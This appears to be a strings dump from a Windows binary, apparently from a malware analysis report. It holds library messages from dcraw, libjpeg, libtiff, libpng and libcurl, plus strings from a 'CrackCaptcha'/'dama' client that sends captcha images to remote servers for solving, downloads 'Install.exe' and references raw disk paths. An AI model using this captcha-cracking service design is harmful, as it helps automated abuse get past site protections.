e[%d][%d]=%f
numinchans=%d, numoutchans=%d, clutlen=%d
x:
1.900.1
packet offset=ld prg=%d cmptno=d rlvlno=d prcno=d lyrno=d
coding pass failed passtype=%d segtype=%d
csid=%d
method=%d; pri=%d; approx=%d
channo=%d; type=%d; assoc=%d
cmptno=%d; map=%d; pcol=%d
numchans = %d
LUT[%d][%d]=%d
numents=%d; numchans=%d
type=%c%s%c (0xx); length=%d
%s: Out of memory in %s
?%s: decoder table overflow
%d.%d.%d
%d %d
%d,%d
%d %d %d
/.badpixels
%s is not a valid PGM file!
%s has the wrong dimensions!
Scaling with darkness %d, saturation %d, and
%s: Cannot use camera p->white balance.
Median filter pass %d...
11124811248488
012347800000005896
%d:%d:%d %d:%d:%d
@0134567028
023457000000006000
012346000000000000
.Ad530flex
%d:%d:%d
%*s %s %d %d:%d:%d %d
v%d %dx%d
A%s %s
Converting to %s colorspace...
?d:d:d d:d:d
12435867
?Unknown option "-%c".
Non-numeric argument to "-%c"
114111111422
%f %f %f
Ixpress %d-Mp
50132467
Failed to read metadata from %s
Reading metadata from %s ...
%s: You must link dcraw with libjpeg!!
%dx%d
1.2.5
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Bogus message code %d
%ld%c
?0123456789ABCDEFlibpng warning: %s
libpng error: %s
Buffer error in compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Incomplete compressed datastream in %s chunk
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%d, gy=%d, bx=%d, by=%d
wx=%d, wy=%d, rx=%d, ry=%d
incorrect gamma=(%d/100000)
Ignoring iCCP chunk with declared size = %u and actual length = %u
NULL row buffer for row %ld, pass %d
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
%s: Must set "PlanarConfiguration" before writing data
%s: No space for %s arrays
%s: Must set "ImageWidth" before writing data
%s: File not open for writing
%s: No space for output buffer
%s: No space to expand strip arrays
%d: Sample out of range, max %d
Integer overflow in %s
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
Failed to allocate memory for %s (%ld elements of %ld bytes each)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: wrong data type %d for "%s"; tag ignored
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
%s compression support is not configured
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
%s: %s
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
Row pixels integer overflow (rowpixels %u)
%s: No space for Group 3/4 reference line
C Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
?#%X.y
Broken pipe
Inappropriate I/O control operation
Operation not permitted
\\.\Scsi%d:
\\.\PhysicalDrive%d
,./1234567
Referer:%s
Cookie: %s
CInternetFileOperator
InternetOpen(%s) failed
InternetOpenUrl(%s) failed(err=%d, header=%s)
HttpQueryInfo(%s, %d) failed(err=%d)
Request URL(%s) return %s
HttpQueryInfo(%s, ContextType) failed(err=%d)
ReadInternetFile(%s, ContextType=%s) failed
Alloc cookie memory failed(len=%d)
InternetReadFile(%d) failed(err=%d)
Alloc file memory failed(datalen=%d, retlen=%d)
FIELD_ID_NEW_PASSWORD
FIELD_ID_FILE_SERVER_PORT
FIELD_ID_MAIN_SERVER_PORT
FIELD_ID_FILE_URL
FIELD_ID_FILE_URL_LEN
FIELD_ID_KEY
FIELD_ID_PASSWORD
ip=%s
C:\work\VCodeServer\Common\include\IPacketDataWriterImpl1_0.h
Login_Req
Login_Rsp
AppReportVCodeRight_Req
AppReportVCodeRight_Rsp
[%7lu]Get packet define failed(seq=%lu, cmd=%lu)
[%7lu]Get packet define and session data failed(seq=%lu, cmd=%lu)
[%7lu]Set offset error(seq=%lu, cmd=%lu)
[%7lu]MAC error(seq=%lu, cmd=%lu)
[%7lu]Packet fixed length error(dwFixLen=%d)
[%7lu]Packet head VCC Verify error(src=%d, comp=%d, seq=%lu, cmd=%lu)
[%7lu]Command(%d) not support(seq=%lu)
[%7lu]Packet length(%d) error(seq=%lu, cmd=%lu)
[%7lu]Packet type(%d) error(seq=%lu, cmd=%lu, srcdest=%d)
[%7lu]Get Memory Failed(seq=%lu, cmd=%lu)
[%7lu]Packet ID not found(srcdest=%d, cmdID=%d)
verify code of encrypt key error
verify code of MAC key error
Field(%s) offset(%d) is greater than data length(%d)
Decrypt field(%s) failed
Offset(%d) > Len(%d) [packect=%s, field=%s]
EncryptData error [packect=%s, field=%s]
[%7lu]Packet ID not found(PacketID=%d, cmd=%lu, srcdest=%d)
[%7lu]Session ID not found(cmd=%lu, srcdest=%d, sessionid=%d)
open.baidu.com
time.nist.gov
asia.pool.ntp.org
cn.ntp.org.cn
time.mayihd.com
WSASocket Failed ,code=%d
WSACreateEvent() Failed , code=%d
Connect fail(err=%d, server=%d, port=%d, socket=%d, time=%d)
Connect server(%d:%d) success(socket=%d)
Connect server(%d:%d) failed(socket=%d, time=%d)
Connect server(%d:%d) success(socket=%d): connect return: %d
send fail(err=%d, socket=%d)
Receive fail(err=%d, socket=%d)
WSAEventSelect() Failed ,code=%d
WSAEnumNetworkEvents(%d,%d) Failed ,code=%d
events.lNetworkEvents(%d) & %d != 0 (socket=%d, err=%d)
events.lNetworkEvents & FD_CLOSE != 0 (socket=%d, err=%d)
WSAEnumNetworkEvents(%d,%d) exception ,ret=%d, lNetworkEvents=%d, LastError=%d
Synchronize time success by %s:%d
GET /special/time/ HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: open.baidu.com
window.baidu_time(
HTTP/
Exit %s(used %dms)
%u.%u.%u.%u
RespCode=%d(seq=%lu)
user name is empty(seq=%lu, cmd=%lu)
CrackCaptchaClient.ini
%s\%s
Software ID error(%s)
Enter %s
InnerLogin
%s login(softname=%s)
byRespCode=%d
%s logoff(softname=%s)
RegisterUser(%s) success
ReadUserInfo(%s) success
start decode: url=%s, len=%d, timeout=%d, type=%d
Internet add task failed(ProcessID=%u)
start decode: datalen=%d, ext=%s, len=%d, timeout=%d, type=%d
start GetResult: processID=%u, uTimeout=%u
GetResult Error: processID=%u
GetResult Success: processID=%u, VCode=%s, id=%u
vcode buffer len(%d) < vcode len(%d)
GetDecodeResult success(uProcessID=%d, vcodeid=%lu, VCode=%s)
ReportDecodeCorrectness success(vcodeid=%lu)
QueryUserBalance success(user=%s, balance=%d)
Recharge success(user=%s, cardno=%s)
FetchVCodeImage success(processid=%d)
ProcessID(%d) not in WorkerFetchResult
GetFetchVCodeImageResult finish(processid=%d, uVCodeID=%lu, err=%d, RespCode=%d)
RefreshVCode Reader empty(processid=%d)
RefreshVCode: Cookie is empty(processid=%d)
RefreshVCode no data(processid=%d)
RefreshVCode no data(processid=%d, file is downloading)
RollbackVCode success(count=%d)
stat buffer len(%d) <= stat info len(%d)
QueryStatistics success(stat=%s)
Get Memory Failed, BlockCount=%d
[%d]connected to server(ip=%d, port=%d)
[%d]Unpack error(seq=%lu, cmd=%lu)
[%d]received: seq=%lu, cmd=%lu, rsp=%d
[%d]RequestDecode no record: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no ResultSeq2DecSeq: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no record: seq=%lu, cmd=%lu, rsp=%d
[%d]SetReqSeqNoData failed(seq=%lu, cmd=%lu, rsp=%d)
[%d]Data sent(len=%d)
[%d]socket closed
nolog.ini
dama.log
dama_bak.log
d-d-d d:d:d.d
[%d]request: seq=%lu, cmd=%lu
[%d]Pack error
[%d]Add Send Data error
Create Packet Writer failed(cmd=%lu)
socket connector connect failed(%s)
Inner login failed
server1.mayihd.com
server.mayihd.com
RetFileNameLen(%d) <= dwPrexLen(%d) or url(%s) not include prex
Get Var memory failed(len=%d)
SOCKFILE://%s/%s
[%d]call PacketBuiler.Pack failed(seq=%lu,cmd=%lu)
call BlockingClientSocket.Connect failed(ip=%s)
call BlockingClientSocket.Send failed(len=%d)
call BlockingClientSocket.Receive failed(recvlen=%d, left=%d)
recv data(len= %d)
Packet Length error(recvlen=%d)
call PackBuilder.Unpack failed
RespCode=%d
File Server IP error(filename=%s)
Start download file(%s)
failed to download file(%s, used %dms)
succeed to download file(%s, used %dms)
Get Var Memory failed(len=%d)
call DownloadFile(%s) failed
call FileOp.DownloadFile(%s) failed
\Install.exe
CreateFile(%s) failed(err=%d)
WriteFile(%s,len=%d) failed(err=%d)
download file from internet failed(%s)
start upload file(seq=%d) ...
failed upload file(seq=%d, err=%d)
end upload file(seq=%d) ...
Failed to DownloadFile(%s, resp=%d)
Picture file name Count = 0(%s)
Picture (%s) is invalid(%s)
Picture Count = 0(%s)
failed to encode dest image (%s)
Send HeatBeat init failed(resp=%d, usedtime=%dms)
Send HeatBeat failed(resp=%d, usedtime=%dms)
Send HeatBeat success(seq=%d, usedtime=%dms)
DataLen(%d) is too large
Allocate memory(%d) failed
worker socket sleep timeout:%d
WSAEnumNetworkEvents(s=%d, event=%d) failed(err=%d)
close event waited[events.lNetworkEvents & FD_CLOSE)=%d, err=%d]
[%7lu]send(sock=%d, len=%d) failed(err=%d)
[%7lu]recv(sock=%d, len=%d) failed(err=%d)
OnSocketDataReceived return %d
CrackCaptchaAPI.log
CrackCaptchaAPI_bak.log
Failed to CreateFile(%s): error=%d
Failed to GetFileSize(%s): dwLen=%d
Failed to ReadFile(%s): error=%d
Failed to ReadFile(%s): Len=0
Failed to EncodeImage(%s)
C:\work\VCodeServer\Release\MayiAPI.pdb
InternetOpenUrlA
PeekNamedPipe
MayiReportError
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.?AUILogInterface@@
.?AVCServerFileOperateWorkerThread@CServerFileOperateThread@@
.?AVCServerFileOperateThread@@
>'>,>3>8>
:-:2:9:>:
6,61686=6{6
=->3>8>>>
7$7-797E7R7Y7d7l7t7}7
2 34383<3@3
> >$>(>,>0>
2-222[3{3
2*313&4.4
1'14182]2
7#7,757>7
40=0"232
9#9-989@9
=!=$=)=@={=
4A4F4O4X4q4
3,5151767
< <$<(<,<0<4<8<<<@<
6 6$6(6,606
5 5@5\5`5
6 6<6@6`6
time.dama2.com
CrackCaptcha.log
CrackCaptcha_bak.log
server1.dama4.com
server.dama4.com
C:\work\VCodeServer\Release\CrackCaptchaAPI.pdb
1$1)1@1.363
94989<9@9
:8:<:@:~:
4$4)4.4:4
: :$:(:,:0:4:8:<:@:
02373^4}4
: :$:(:]:
< <$<(<,<0<4<8<<<
7 7$7(7,7
,0004080
0024282<2
? ?$?(?,?7?
0/141`1{1
9$9(9,9094989<9
1 2%2%3*3
5 5<5@5`5|5
6 6@6\6`6
UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU<UUU=>?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULLUUMUUUUUUUUUNUUOUPQRSUUT
!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FF<=>FF?FFFFF@ABFFFFFCFDFFFFFE
%u$Wj%
t.Gj:W
.jpeg
; filename="%s"
------------------------xx
--%s--
couldn't open file "%s"
Content-Type: %s
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
%%X
Could not resolve %s: %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
%s:%d
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
Curl_addHandleToPipeline: length: %d
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
http_proxy
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Server doesn't support pipelining
Found bundle for host %s: %p
Connection #%ld to host %s left intact
Rebuilt URL to: %s
smtp
SMTP.
<url> malformed
:]://%[^
[^:]:%[^
Re-using existing connection! (#%ld) with host %s
Found connection %ld, with requests in the pipe (%zu)
%s://%s
Internal error removing splay node = %d
Internal error clearing splay node = %d
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
In state %d with no easy_conn, bail out!
Pipe broke: handle 0x%p, url = %s
[%s %s %s]
Send failure: %s
Recv failure: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
WARNING: failed to save cookies in %s
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
Local port: %hu
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
couldn't connect to %s at %s:%ld
Failed connect to %s:%ld; %s
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
0123456789
%d.%d.%d.%d
%s%s%s%s%s%s
Session: %s
%s %s RTSP/1.0
Range: %s
Referer: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
SMTP
EHLO %s
HELO %s
No known authentication mechanisms supported!
AUTH %s %s
LOGIN
AUTH %s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s
RCPT TO:<%s>
RCPT TO:%s
Got unexpected smtp-server response: %d
STARTTLS denied. %c
STARTTLS not supported.
Remote access denied: %d
Access denied: %d
Authentication failed: %d
MAIL failed: %d
RCPT failed: %d
SMTPS not supported!
USER %s
APOP %s %s
%s %s
STLS not supported.
Access denied. %c
PASS %s
POP3S not supported!
IMAPS not supported!
%cd
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]
APPEND %s (\Seen) {%lld}
LOGINDISABLED
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
invalid tsize -:%s:- value in OACK packet
%s (%ld)
blksize is smaller than min supported
%s (%d)
blksize is larger than max supported
%s (%d) %s (%d)
got option=(%s) value=(%s)
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
Received unexpected DATA packet block %d, expecting block %d
Received last DATA packet block %d again.
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
bind() failed; %s
tftp_send_first: internal error
%s%c%s%c
TFTP finished
TFTP response timeout
Can't get the size of %s
Can't open %s for writing
Last-Modified: %s, d %s M d:d:d GMT
Couldn't open file %s
There are more than %d entries
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%ld
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.32.0
MATCH %s %s %s
DEFINE %s %s
insufficient winsock version to support telnet
WSAStartup failed (%d)
%s %d %d
%s %s %d
%s %s %s
%s IAC %d
%s IAC %s
Sending data failed (%d)
%d (unknown)
%s (unsupported)
%s IAC SB
Unknown telnet option %s
Syntax error in telnet option: %s
7[^= ]%*[ =]%5s
USER,%s
%c%c%c%c%s%c%c
%c%s%c%s
7[^,],7s
%c%c%c%c
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
PORT
Failure sending PORT command: %s
,%d,%d
Failure sending EPRT command: %s
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
bind(port=%hu) on non-local address failed: %s
socket failure: %s
failed to resolve the address provided to PORT: %s
getsockname() failed: %s
Connect data stream passively
STOR %s
APPE %s
SIZE %s
RETR %s
ftp server doesn't support SIZE
PBSZ %d
Access denied: d
ACCT %s
ACCT rejected by server: d
Connecting to %s (%s) port %d
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
FTP response aborted due to select/poll error: %d
FTP response timeout
MDTM %s
Bad PASV/EPSV response: d
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
Illegal port number in EPSV reply
%c%c%c%u%c
ddd d:d:d GMT
dddddd
unsupported MDTM reply format
QUOT string not accepted: %s
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
Preparing for accepting server on data port
CWD %s
Failed FTP upload: 

RETR response: d
server did not report OK, got %d
Failure sending ABOR command: %s
Remembering we are in dir "%s"
ftp_perform ends with SECONDARY: %d
PRET RETR %s
PRET STOR %s
PRET %s
REST %d
Got a d response code instead of the assumed 200
TYPE %c
Failed to do PORT
PRET command not accepted: d
Failed to MKD dir: d
MKD %s
QUOT command failed with d
Entry path is '%s'
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
%sAuthorization: Basic %s
%s:%s
%s auth using %s with user '%s'
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %s
If-Unmodified-Since: %s
Last-Modified: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Internal HTTP POST error!
Failed sending HTTP request
%s%s=%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
PTF://
Host: %s%s%s:%hu
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
RTSP/%d.%d =
HTTP =
HTTP/%d.%d =
%s, algorithm="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%s:%s
xxxx
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Received HTTP code %d from proxy after CONNECT
CONNECT %s HTTP/%s
%s%s%s%s
Host: %s
%s%s%s:%hu
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
TUNNEL_STATE switched to: %d
HTTP/1.%d %d
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
